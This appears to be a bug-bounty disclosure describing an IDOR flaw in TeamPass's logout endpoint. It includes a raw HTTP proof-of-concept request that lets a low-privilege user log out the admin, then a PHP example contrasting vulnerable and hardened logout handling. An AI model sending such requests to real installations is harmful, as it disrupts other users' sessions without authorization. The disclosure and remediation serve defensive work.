huntr / Choocs / F6683C3B-A0F2-4615-B639-1920C8AE12E6
Feb 28, 2023 - 7:46 a.m.

IDOR Vulnerability Allows Low-Level User to Log Out Everyone, Including Admin

2023-02-28 07:46:06
choocs
www.huntr.dev

CVSS3: 5.4 Medium
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: LOW
  Availability Impact: LOW
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

CVSS2: 5.5 Medium
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:S/C:N/I:P/A:P

EPSS: 0.0004 Low
  Percentile: 11.4%

Description

An IDOR vulnerability allows a low-level user to log out everyone in the system by changing the user ID.

Proof of Concept

Step 1: Log in as admin.

Step 2: Go to user and add a user. Set role to Default.

Step 3: Log in as the new user.

Step 4: Log out the user.

GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Change the user_id to any other ID. For this example, we use 1 as the admin user_id.

Below is the response to the request submitted above.

HTTP/1.1 200 OK
Date: Tue, 28 Feb 2023 07:25:00 GMT
Server: Apache/2.4.54 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/html; charset=utf-8


    <script type="text/javascript" src="../../plugins/store.js/dist/store.everything.min.js"></script>
    <script language="javascript" type="text/javascript">
    
    </script>

Step 5: The admin has been logged out.
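
The missing authorization check, shown as an added example that is not TeamPass code and not the project's actual fix: a logout handler that takes its target from the user_id query parameter, beside one that binds the target to the caller's own session. The function names, the session array layout and the in-memory session table are assumptions, and no admin "force logout" feature is modelled.

```php
<?php
// Added example, not TeamPass code. All names and data here are hypothetical.

/** Pattern the report describes: the target account comes from the query string. */
function logoutTargetVulnerable(array $session, array $query): ?int
{
    // Any authenticated caller can name any account.
    return isset($query['user_id']) ? (int) $query['user_id'] : null;
}

/** Hardened: the target is always the caller's own session identity. */
function logoutTargetHardened(array $session, array $query): ?int
{
    if (!isset($session['user_id'])) {
        return null;                    // unauthenticated: nothing to log out
    }
    $self = (int) $session['user_id'];
    // A client-supplied id is never trusted; a mismatch is rejected and logged.
    if (isset($query['user_id']) && (int) $query['user_id'] !== $self) {
        error_log("logout: session user $self asked to log out user " . (int) $query['user_id']);
        return null;
    }
    return $self;
}

/** Drops the target's entry from the session table; true if an entry was removed. */
function logout(array &$activeSessions, ?int $target): bool
{
    if ($target === null || !isset($activeSessions[$target])) {
        return false;
    }
    unset($activeSessions[$target]);
    return true;
}

// Constructed data: user 1 is the admin, user 10000001 is the low-privilege caller.
$caller  = ['user_id' => 10000001];
$request = ['user_id' => '1'];

$active = [1 => 'admin-session', 10000001 => 'user-session'];
logout($active, logoutTargetVulnerable($caller, $request));
var_dump(isset($active[1]));   // is the admin's session still present?

$active = [1 => 'admin-session', 10000001 => 'user-session'];
logout($active, logoutTargetHardened($caller, $request));
var_dump(isset($active[1]));   // same question for the hardened path
```

The mismatch log line in the hardened path doubles as a detection signal: a legitimate client has no reason to send a user_id other than its own.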
